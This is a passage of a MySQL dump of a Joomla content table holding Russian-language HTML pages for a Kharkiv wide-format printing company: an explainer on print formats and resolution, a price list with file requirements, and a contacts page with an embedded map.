  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `images` text NOT NULL,
  `urls` text NOT NULL,
  `attribs` text NOT NULL,
  `version` int(11) unsigned NOT NULL DEFAULT '1',
  `parentid` int(11) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `metakey` text NOT NULL,
  `metadesc` text NOT NULL,
  `access` int(11) unsigned NOT NULL DEFAULT '0',
  `hits` int(11) unsigned NOT NULL DEFAULT '0',
  `metadata` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_section` (`sectionid`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`)
) ENGINE=MyISAM AUTO_INCREMENT=28 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_content`
--

LOCK TABLES `jos_content` WRITE;
/*!40000 ALTER TABLE `jos_content` DISABLE KEYS */;
INSERT INTO `jos_content` VALUES (1,'Оборудование','2010-11-06-15-56-21','','<p> </p>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3 style=\"text-align: center;\">Формат широкоформатной печати</h3>\r\n<p style=\"text-align: justify;\">Из самой формулировки \"широкоформатная печать\", становится понятно, что это печать на материале широкого формата, намного отличающегося от обычных пользовательских размеров.</p>\r\n<h5><strong>Что же такое формат печати?</strong></h5>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/format.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" />Формат печати определяется двумя параметрами: шириной и высотой листа. Как правило ширина и высота зависят друг от друга в определенной пропорции. К примеру, формат печати \"А\" это пропорция высоты к ширине равная 1,41. Таким образом, у каждого формата печати есть свой стандартизированный международный индекс обозначения.</p>\r\n<p style=\"text-align: justify;\"><strong>Широкоформатная печать и формат печати – не связанные понятия</strong><br /> <br /> Широкоформатная печать также определяется параметрами \"ширина\" материала для печати и длиной рулона, но, в отличие от формата печати, здесь не выдерживаются стандартизированные пропорции касающиеся соотношения \"высота\".  <br /> <br /> Назвать широкоформатную печать исключительно \"форматной\" нельзя, так как готовое изделие может иметь как стандартный формат так и абсолютно \"неформатный\" размер. Что вполне логично, ведь рекламы, вывески, плакаты, согласно разнообразности дизайнерских решений, имеют абсолютно разные пропорции</p>\r\n<h5 style=\"text-align: justify;\"><strong>Размеры материалов для широкоформатной печати</strong></h5>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/razmer.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" />Хотя строгих стандартов для широкоформатной печати нет, все же есть определенные размеры печатных материалов, которые наиболее удобны для печати. Таким образом подобранные размеры рулонов, позволяют максимально продуктивно использовать всю площадь запечатываемого материала.<br /> <br /> Список основных материалов для широкоформатной печати со стандартными размерами рулонов:</p>\r\n<p style=\"text-align: justify;\"><strong>Печать баннера</strong>: длина рулона 50 или 100 м, ширина: 1,37 м; 1,6 м; 2,5 м; 3,2 м; 5,2 м</p>\r\n<p style=\"text-align: justify;\"><strong>Печать на самоклеющейся пленке</strong>: длина рулона 50 или 100 м, ширина: 1 м; 1,26 м; 1,4 м; 1,6 м</p>\r\n<p style=\"text-align: justify;\"><strong>Печать на просветной бумаге \"Бэклит\"</strong>: длина рулона 300 м, ширина 1,27 м. (размер бумаги \"Бэклит\" обусловлен использованием для ситилайтов, размер которых 1,2х1,8)</p>\r\n<p style=\"text-align: justify;\"><strong>Печать на бумаге Блюбэк</strong>: длина рулона 300 м, ширина 1,6 м. Бумага Блюбек предназначена для оклейки бигбордов с размероами 3х6м. Бигборды данной бумагой оклеиваются со стыковкой материла.</p>\r\n<p style=\"text-align: justify;\">Отметим, что печать точно по размеру рулона практически не возможна из-за прижимных роликов принтера, фиксирующих материал по краям. Размеры валиков колеблются от 30 до 70 мм.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3 style=\"text-align: center;\"><strong><strong>Широкоформатная печать – разрешение</strong></strong></h3>\r\n<h5><strong>Обозначение разрешения</strong></h5>\r\n<p><img src=\"images/stories/dpi.jpg\" border=\"0\" width=\"150\" style=\"margin-left: 5px; margin-right: 5px; float: left; border: 0pt none;\" />Разрешение широкоформатной печати обозначается в DPI (звучит как ди-пи-ай) сокращенно от англ. dots per inch. DPI – это количество точек на линейный дюйм, или, более понятно, количество микрокапелек краски на один дюйм материала (1 дюйм = 2,54 см).<br /> <br /> Так, к примеру, обозначение 720*1440 dpi значит, что на 1 дюйм приходится 720 точек по горизонтали и 1440 точек по вертикали.<br /> <br /> DPI основной параметр влияющий на качество печати. И чем больше точек, тем качественнее и четче изображение, тем реалистичнее и ярче выглядит картинка.</p>\r\n<p> </p>\r\n<h5><strong>Размер капли головки принтера</strong></h5>\r\n<p><img src=\"images/stories/kaplja.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"125\" style=\"margin: 5px; float: left; border: 1px solid grey;\" />Размер капли головки принтера, еще один немаловажный фактор который определяет качество широкоформатной печати. Измеряется размер капли в <strong>пкл</strong> – пикалитрах. Чем больше размер капли головки принтера, тем более \"зернистое\" изображение.</p>\r\n<p>Какой размер капли головки использовать в печати, определяют по назначению печатного материала.</p>\r\n<p>Широкоформатная печать уличной графики предполагает применение разрешения печати 180, 360, 520 dpi с размером капли 32-54 пкл.</p>\r\n<p><strong>Широкоформатная печать</strong> интерьерной графики интерьерной графики предполагает разрешение печати 720-1080 dpi с размером капли 17-32 пкл.</p>\r\n<p><strong>Широкоформатная печать</strong> в фото качестве выполняется с разрешением 1440 dpi и размером капли от 7 до17 пкл.</p>\r\n<p>В \"ЭкваторПринт\" <a href=\"/\" title=\"широкоформатная печать Харьков\"><strong>широкоформатная печать</strong></a> выполняется согласно данных зависимости разрешения, размера капли и назначения печатаемого материала.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2010-11-06 15:56:02',62,'','2015-10-11 06:53:13',62,0,'0000-00-00 00:00:00','2010-11-06 15:56:02','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',32,0,27,'широкоформатная печать харьков, цифровая печать харьков, цветная печать харьков, пленка печать харьков, печать на холсте харьков, баннер печать харьков, оборудование широкоформатная печать','Широкоформатная печать на высококачественном оборудовании. Широкоформатная печать пленка, баннер, на холсте. Цифровая цветная печать ',0,9962,'robots=\nauthor='),(2,'Прайс-лист','2010-11-06-15-56-43','','<p><a href=\"tmp/price.xls\" title=\"широкоформатная печать Харьков цена\"><img src=\"images/stories/kraski.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков цена\" title=\"широкоформатная печать Харьков цена\" width=\"50\" height=\"46\" style=\"border: 0pt none; vertical-align: middle;\" /></a><span style=\"font-size: small;\"><a href=\"tmp/price.xls\" title=\"широкоформатная печать цена\">Скачать прайс лист</a> <strong>качество печати до 1440dpi</strong></span></p>\r\n<table style=\"width: 758px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\">\r\n<tbody>\r\n<tr height=\"24\">\r\n<td style=\"text-align: center; background-color: #172983; width: 835px; height: 24px;\" colspan=\"6\"><span style=\"font-size: small;\"><strong><span style=\"color: #ffec00;\"><span style=\"font-size: large;\">СТОИМОСТЬ ПЕЧАТИ (МАТЕРИАЛ С ПЕЧАТЬЮ)</span></span></strong></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"21\">\r\n<td rowspan=\"2\" height=\"21\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">№</span></strong></span></td>\r\n<td rowspan=\"2\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\"><span style=\"font-size: large;\"><span style=\"color: #000000;\">Материал</span></span></span></strong></span></td>\r\n<td rowspan=\"2\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">Ширина рулона (м)</span></strong></span></td>\r\n<td rowspan=\"2\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">Плотность(г/м2)</span></strong></span></td>\r\n<td colspan=\"2\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\"><span style=\"font-size: large;\"><span style=\"color: #000000;\">Стоимость(грн./м2)</span></span></span></strong></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; width: 60px;\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">до 5м?</span></strong></span></td>\r\n<td style=\"width: 60px;\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\"> от 5м?</span></strong></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"24\">\r\n<td style=\"text-align: center;\" height=\"24\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">1</span></strong></span></td>\r\n<td style=\"text-align: left;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">Самоклеющаяся пленка FotoJet<br /></span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">1.04/1.24/1.48</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">120</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">71</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">61</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">2</span></strong></span></td>\r\n<td><span style=\"color: #000000;\"><br /></span></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><br /></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\"> <br /></span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><br /></span></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><br /></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">3</span></strong></span></td>\r\n<td><span style=\"color: #000000;\"><span style=\"font-size: small;\">Самоклеющаяся пленка перфорированная One Way Vision</span> <span style=\"font-size: small;\"> </span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">1.04/1.24/1.48</span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">120</span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">116</span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">102</span></span></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"6\"><span style=\"font-size: small;\"><span style=\"color: #000000;\"><br /></span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"24\">\r\n<td style=\"text-align: center;\" height=\"24\"><span style=\"font-size: small;\"><span style=\"color: #333333;\"><strong><span style=\"color: #000000;\">4</span></strong></span></span></td>\r\n<td style=\"text-align: left;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">Баннерная ткань ламинированная </span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">3.15/2.15/1.55/1.05</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">440</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">72</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">62<br /></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #333333;\"><strong><span style=\"color: #000000;\">5</span></strong></span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">Баннерная ткань литая </span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">3.15/2.05/1.55/1.05<br /></span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">510</span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">100</span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">87</span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"24\">\r\n<td style=\"text-align: center;\" height=\"24\"><span style=\"font-size: small;\"><span style=\"color: #333333;\"><strong><span style=\"color: #000000;\">6</span></strong></span></span></td>\r\n<td style=\"text-align: left;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">Сетка баннерная</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">3.15</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">270</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">100</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">87</span></span></td>\r\n</tr>\r\n<tr height=\"17\">\r\n<td colspan=\"6\" height=\"17\"><span style=\"font-size: small;\"><span style=\"color: #000000;\"> <br /></span></span></td>\r\n</tr>\r\n<tr>\r\n</tr>\r\n<tr style=\"text-align: center;\">\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #333333;\"><strong><span style=\"color: #000000;\">7</span></strong></span></span></td>\r\n<td style=\"text-align: left;\">\r\n<p style=\"text-align: left;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">Постер сити-лайт (1.2х1.8)на бумаге \"Бэклит\" (за шт.)</span></span></p>\r\n</td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">1.2</span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">150</span></span></td>\r\n<td style=\"text-align: center;\" colspan=\"2\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">109</span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\">\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #333333;\"><strong><span style=\"color: #000000;\">8</span></strong></span></span></td>\r\n<td style=\"text-align: left;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">Постер (билборд) 3x6 на бумаге блюбэк (за шт.)</span></span></td>\r\n<td><span style=\"color: #000000;\"><br /></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">115</span></span></td>\r\n<td colspan=\"2\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">443</span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\">\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #333333;\"><strong><span style=\"color: #000000;\">8</span></strong></span></span></td>\r\n<td style=\"text-align: left;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">Бумага блюбэк (за м.кв.)</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">1.18/1.48</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">115</span></span></td>\r\n<td colspan=\"2\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">36</span></span></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"7\"><span style=\"color: #000000;\"><br /></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\">\r\n<td><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">9</span></strong></span></td>\r\n<td style=\"text-align: left;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">Ткань флажная</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">1.46</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">120</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">152</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">137</span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\">\r\n<td><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">10</span></strong></span></td>\r\n<td style=\"text-align: left;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">Фото обои</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">1.24</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\"> <br /></span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">259</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">235</span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\">\r\n<td><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">11</span></strong></span></td>\r\n<td style=\"text-align: left;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">Холст художественный матовый <br /></span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"text-align: left;\"><span style=\"text-align: left;\"><span style=\"line-height: 17px;\"><span style=\"color: #000000;\">1,04/1,24/1,48</span></span></span></span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">350</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">250</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">230</span></span></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"6\"><span style=\"font-size: small;\"><span style=\"color: #000000;\"><br /></span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\">\r\n<td><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">12</span></strong></span></td>\r\n<td style=\"text-align: left;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">Бумага для скроллов (polyman)</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">3.10</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">167</span></span></td>\r\n<td colspan=\"2\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">192</span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\">\r\n<td colspan=\"7\"><span style=\"font-size: small;\"><span style=\"color: #333333;\"><strong>*особые условия сотрудничества для рекламных агентств и постоянных клиентов.</strong></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 758px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\">\r\n<tbody>\r\n<tr height=\"24\">\r\n<td style=\"text-align: center; background-color: #172983; height: 24px;\" colspan=\"4\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong><span style=\"font-size: large;\">ДОПОЛНИТЕЛЬНЫЕ    УСЛУГИ</span></strong></span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"24\">\r\n<td height=\"24\"><span style=\"font-size: small;\"><strong>№</strong></span></td>\r\n<td><span style=\"font-size: small;\"><strong>Наименование</strong></span></td>\r\n<td><span style=\"font-size: small;\"><strong>Единицы</strong></span></td>\r\n<td><span style=\"font-size: small;\"><strong>Стоимость</strong></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"24\">\r\n<td style=\"text-align: center;\" height=\"24\"><span style=\"font-size: small;\"><strong>1</strong></span></td>\r\n<td style=\"text-align: left;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">Установка люверсов</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\"> грн./шт.</span></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">2</span></span></td>\r\n</tr>\r\n<tr height=\"24\">\r\n<td style=\"text-align: center;\" height=\"24\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">2</span></strong></span></td>\r\n<td><span style=\"font-size: small;\"><span style=\"color: #000000;\">Сварка баннерной ткани за 1 п.м</span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\"> грн/1п.м</span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">15</span></span></td>\r\n</tr>\r\n<tr height=\"17\">\r\n<td height=\"17\"><span style=\"color: #000000;\"><strong style=\"color: #000000; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: small; line-height: normal; text-align: center;\"> 3</strong><br /><span style=\"font-size: small;\"> </span></span></td>\r\n<td style=\"text-align: left;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">Изготовление/корректировка макета</span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"color: #000000;\"><span style=\"font-size: small;\">грн./шт.</span></span></td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><span style=\"color: #000000;\">от 100</span></span></td>\r\n</tr>\r\n<tr height=\"24\">\r\n<td style=\"text-align: center; background-color: #172983; height: 24px;\" colspan=\"4\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong><span style=\"font-size: large;\">ТРЕБОВАНИЯ К МАКЕТАМ</span></strong></span></span></td>\r\n</tr>\r\n<tr height=\"17\">\r\n<td style=\"text-align: center;\" height=\"17\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">1</span></strong></span></td>\r\n<td colspan=\"3\"><span style=\"color: #000000;\"><span style=\"line-height: normal;\"><span style=\"font-size: medium;\">Файлы принимаются в формате TIF (Adobe Photoshop)</span></span><br /></span></td>\r\n</tr>\r\n<tr height=\"17\">\r\n<td style=\"text-align: center;\" height=\"17\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">2</span></strong></span></td>\r\n<td colspan=\"3\"><span style=\"color: #000000;\"><span style=\"line-height: normal;\"><span style=\"font-size: medium;\">Макет должен быть в реальном размере (1:1)</span></span><br /></span></td>\r\n</tr>\r\n<tr height=\"17\">\r\n<td style=\"text-align: center;\" height=\"17\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">3</span></strong></span></td>\r\n<td colspan=\"3\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\">Все слои в макете должны быть сведены</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">4</span></strong></span></td>\r\n<td colspan=\"3\"><span style=\"font-size: small;\"><span style=\"color: #333333;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\">Разрешение в макете для печати интерьерной рекламы должно быть до 200 пикс./дюйм, для наружной рекламы - до 70 пикс./дюйм.</span></span></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">5</span></strong></span></td>\r\n<td colspan=\"3\">\r\n<p><span style=\"font-size: small;\"><span style=\"color: #333333;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\">Названия файлов должны подписываться в следующем порядке: кол-во штук, материал, размер, дополнительные услуги. </span></span></span></span></p>\r\n<p><span style=\"color: #000000;\"><span style=\"font-size: small;\"><span style=\"font-size: medium;\">К примеру: <em>2шт_пленкаFotoJet_60x60см_обрезка по периметру</em>, </span></span><span style=\"font-size: medium; line-height: 1.3em;\">или </span><em style=\"font-size: medium; line-height: 1.3em;\">3шт_баннер литой_100х150см_подворот_люверсы 30см по периметру.</em></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\"><span style=\"font-size: small;\"><strong><span style=\"color: #000000;\">6</span></strong></span></td>\r\n<td colspan=\"3\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\">При сохранении макета рекомендуется использовать <em>сжатие LZW</em></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>\r\n<p> </p>\r\n<hr />\r\n<p><span style=\"color: #999999;\">Стоимость широкоформатной печати в прайс листе полиграфии ЭкваторПринт характеризуется весьма демократичными ценами и гибкой политикой скидок. Так, цена печати будет выгодно меньше при больших объемах заказа.<br /><br />Печать баннеров  - цена скидки за 1м2 - 10 грн. А наряду с большим объемом, конечная стоимость обойдется значительно дешевле.<br /></span></p>\r\n<p><span style=\"color: #999999;\">Прайс лист ЭкваторПринт отображает все необходимые параметры материалов для печати, цены до 10м2 и от 10м2.</span></p>\r\n<p><span style=\"color: #999999;\">Звоните - мы всегда вам подскажем и объясним.</span></p>\r\n<p>Доставляем широкоформатную печать по всей Украине, условия доставка в самые крупные города можно прочитать перейдя по ссылке ниже:</p>\r\n<p>- <a href=\"printing-in-kharkov/\"><strong>Харьков</strong></a>, печать можно забрать в день заказа или на следующий день<br />- <a href=\"printing-in-kyiv/\"><strong>Киев</strong></a><br />- <a href=\"printing-in-dnepropetrovsk/\"><strong>Днепропетровск</strong></a><br />- <strong>Симферополь</strong><br />- <a href=\"printing-in-zaporozhje/\"><strong>Запорожье</strong></a><br />- <a href=\"printing-in-doneck/\"><strong>Донецк</strong></a><br />- <a href=\"printing-in-odessa/\"><strong>Одесса</strong></a></p>','',1,0,0,0,'2010-11-06 15:56:31',62,'','2015-11-03 07:58:51',62,62,'2015-11-16 10:08:51','2010-11-06 15:56:31','0000-00-00 00:00:00','','','show_title=0\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',194,0,26,'','',0,58831,'robots=\nauthor='),(3,'Контакты','2010-11-06-15-56-56','','<table style=\"width: 920px; margin-left: 10px; float: left;\" border=\"0\" align=\"left\">\r\n<tbody>\r\n<tr valign=\"top\">\r\n<td style=\"width: 350px; height: 60px;\" colspan=\"2\" valign=\"middle\">\r\n<p><span style=\"color: #333333;\">Широкоформатная печать в \"ЭкваторПринт\" по адресу:<br /></span></p>\r\n<p><span style=\"color: #333333;\"><strong>ул. Смольная 30</strong>, Харьков, Украина</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 35px;\"><span style=\"color: #333333;\"><img src=\"images/stories/telefon-1.jpg\" border=\"0\" width=\"30\" height=\"30\" style=\"vertical-align: middle; border: 0pt none;\" /></span></td>\r\n<td style=\"height: 60px;\">\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #333333;\"><strong>Тел.</strong>: 38 (057) 737 25 33</span></span></p>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #333333;\"> <strong>Моб.</strong>: 38 (098) 407-92-92</span></span></p>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #333333;\"> <strong>Моб.</strong>: 38 (099) 407-92-92</span></span></p>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #333333;\"> <strong>Моб.</strong>: 38 (093) 407-92-92</span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><span style=\"color: #333333;\"><img src=\"images/stories/pochta.jpg\" border=\"0\" width=\"30\" style=\"vertical-align: middle;\" /></span></td>\r\n<td style=\"height: 40px;\"><span style=\"color: #333333;\"><strong>e-mail:</strong> ekvatorprint@mail.ru </span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding-top: 20px; width: 600px; height: 450px;\" colspan=\"2\">\r\n<script src=\"http://api-maps.yandex.ru/services/constructor/1.0/js/?sid=FOzu2bDxnEapbtRUr7YxaK9nQNDA-1bb&amp;width=600&amp;height=450\" type=\"text/javascript\"></script>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2010-11-06 15:56:45',62,'','2013-12-20 10:27:03',62,62,'2015-02-20 07:24:13','2010-11-06 15:56:45','0000-00-00 00:00:00','','','show_title=0\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',73,0,25,'','',0,40098,'robots=\nauthor='),(4,'Главная','2010-11-06-16-27-54','','<h1 style=\"text-align: center;\">Широкоформатная печать</h1>\r\n<table class=\"tbl_main_page\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr style=\"height: 20px;\">\r\n<td style=\"background-color: #99ccff;\"></td>\r\n<td></td>\r\n<td style=\"background-color: #99ccff;\"></td>\r\n<td></td>\r\n<td style=\"background-color: #99ccff;\"></td>\r\n<td></td>\r\n<td style=\"background-color: #99ccff;\"></td>\r\n<td></td>\r\n<td style=\"background-color: #99ccff; width: 100px;\"></td>\r\n<td></td>\r\n<td style=\"background-color: #99ccff;\"></td>\r\n</tr>\r\n<tr valign=\"top\">\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=6&amp;Itemid=7\" title=\"печать на холсте\"><img src=\"images/stories/xolst.jpg\" border=\"0\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a href=\"index.php?option=com_content&amp;view=article&amp;id=7&amp;Itemid=8\" title=\"печать на виниле\"><img src=\"images/stories/vinil-s.jpg\" border=\"0\" /></a></p>\r\n</td>\r\n<td></td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a 